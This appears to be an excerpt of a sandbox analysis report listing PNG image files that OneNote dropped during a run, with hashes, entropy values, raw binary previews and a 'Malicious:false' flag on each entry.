                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
